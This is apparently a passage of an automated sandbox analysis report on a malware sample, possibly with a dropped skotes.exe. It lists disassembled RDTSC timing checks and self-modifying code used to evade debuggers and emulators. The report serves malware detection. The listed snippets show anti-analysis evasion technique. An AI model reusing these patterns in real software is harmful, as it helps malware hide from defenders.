Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D21188 second address: D2118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D21569 second address: D2156D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D216DE second address: D21708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F400D181C1Eh 0x00000010 jmp 00007F400D181C12h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D199FE second address: D19A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A04 second address: D19A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A08 second address: D19A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A12 second address: D19A25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jo 00007F400D181C1Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A25 second address: D19A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A2B second address: D19A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D19A2F second address: D19A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CF8AE5 second address: CF8B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F400D181C20h 0x0000000f push ecx 0x00000010 jmp 00007F400D181C12h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D222CC second address: D222D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D222D0 second address: D222D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D222D4 second address: D222E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 jnp 00007F400D37371Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D227F6 second address: D227FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D227FA second address: D22818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D373725h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D27D08 second address: D27D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D281B6 second address: D281BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D2E2AC second address: D2E2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F400D181C11h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D2E2C4 second address: D2E2CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400D373722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D2E2CE second address: D2E2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D2E2D4 second address: D2E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D30886 second address: D3088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3088C second address: D308A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F400D37371Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D30C9A second address: D30CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D30CAE second address: D30CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D30DC3 second address: D30DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D30F08 second address: D30F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D31A93 second address: D31A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D32B42 second address: D32B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D32B47 second address: D32B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D33B82 second address: D33B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D33B86 second address: D33B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D34785 second address: D347AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jg 00007F400D373716h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D347AD second address: D347B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F400D181C06h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D351EF second address: D351F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D374E5 second address: D374EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D374EA second address: D374FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F400D373716h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D374FB second address: D374FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D374FF second address: D3750D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F400D373716h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3750D second address: D37586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F400D181C08h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F400D181C15h 0x0000002a jmp 00007F400D181C16h 0x0000002f push 00000000h 0x00000031 movsx edi, bx 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+1246834Eh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D37586 second address: D3758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3758A second address: D3758E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3758E second address: D37594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3A261 second address: D3A273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F400D181C06h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3A273 second address: D3A288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D373721h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3A288 second address: D3A28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3BEDD second address: D3BF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F400D373718h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov bx, F82Fh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F400D373718h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 add bx, 6BEEh 0x0000004a movzx ebx, dx 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007F400D373723h 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D333A7 second address: D333AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CE07 second address: D3CE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CE0B second address: D3CE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CE11 second address: D3CEA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373728h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F400D373716h 0x00000014 popad 0x00000015 pop esi 0x00000016 nop 0x00000017 mov ebx, dword ptr [ebp+122D2C73h] 0x0000001d mov ebx, dword ptr [ebp+122D2A26h] 0x00000023 push 00000000h 0x00000025 mov ebx, dword ptr [ebp+12456963h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F400D373718h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 pushad 0x00000048 mov edi, dword ptr [ebp+122D2AC6h] 0x0000004e mov edi, dword ptr [ebp+122D2EAEh] 0x00000054 popad 0x00000055 xchg eax, esi 0x00000056 jmp 00007F400D37371Dh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F400D373723h 0x00000063 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CEA8 second address: D3CEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CEAE second address: D3CEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3DF19 second address: D3DF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3DF1F second address: D3DF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, DF98h 0x00000012 push 00000000h 0x00000014 mov di, dx 0x00000017 push 00000000h 0x00000019 add dword ptr [ebp+124576DCh], esi 0x0000001f push eax 0x00000020 pushad 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3FF8E second address: D3FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D43003 second address: D43007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D43007 second address: D4300B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D44F49 second address: D44FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F400D373716h 0x00000009 jmp 00007F400D37371Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F400D373718h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c jnp 00007F400D373718h 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 mov ebx, dword ptr [ebp+122D339Dh] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F400D373718h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 add ebx, dword ptr [ebp+122D1C76h] 0x0000005e jmp 00007F400D373727h 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D460CB second address: D4614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F400D181C0Ah 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F400D181C08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+124829A3h], eax 0x0000002d mov edi, dword ptr [ebp+122D2BA2h] 0x00000033 push 00000000h 0x00000035 jbe 00007F400D181C12h 0x0000003b jmp 00007F400D181C0Ch 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F400D181C08h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c push eax 0x0000005d jnp 00007F400D181C18h 0x00000063 push eax 0x00000064 push edx 0x00000065 js 00007F400D181C06h 0x0000006b rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D47EA9 second address: D47EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D4AE25 second address: D4AE5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F400D181C12h 0x00000008 jmp 00007F400D181C0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F400D181C0Dh 0x00000018 jmp 00007F400D181C0Eh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D4AE5B second address: D4AE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D4AE61 second address: D4AE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D35B25 second address: D35B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D35B2A second address: D35B3C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F400D181C08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D35B3C second address: D35B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D39FD8 second address: D39FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D39FDC second address: D39FE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D39FE2 second address: D39FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D50AA6 second address: D50AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CFEF second address: D3CFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CFF3 second address: D3CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3CFF9 second address: D3D000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3EFDE second address: D3EFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D53EEB second address: D53F08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F400D181C17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D54091 second address: D540A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F400D373722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D540A8 second address: D540B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D540B1 second address: D540B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3EFE2 second address: D3EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3EFF0 second address: D3EFFA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D3EFFA second address: D3F001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D41072 second address: D41077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13290DD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13276C1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1354D60 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1331B7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13B95D4 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Special instruction interceptor: First address: B7E9B3 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Special instruction interceptor: First address: D28251 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Special instruction interceptor: First address: D4DFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Special instruction interceptor: First address: DB181E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 45E9B3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 608251 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 62DFC1 instructions caused by: Self-modifying code
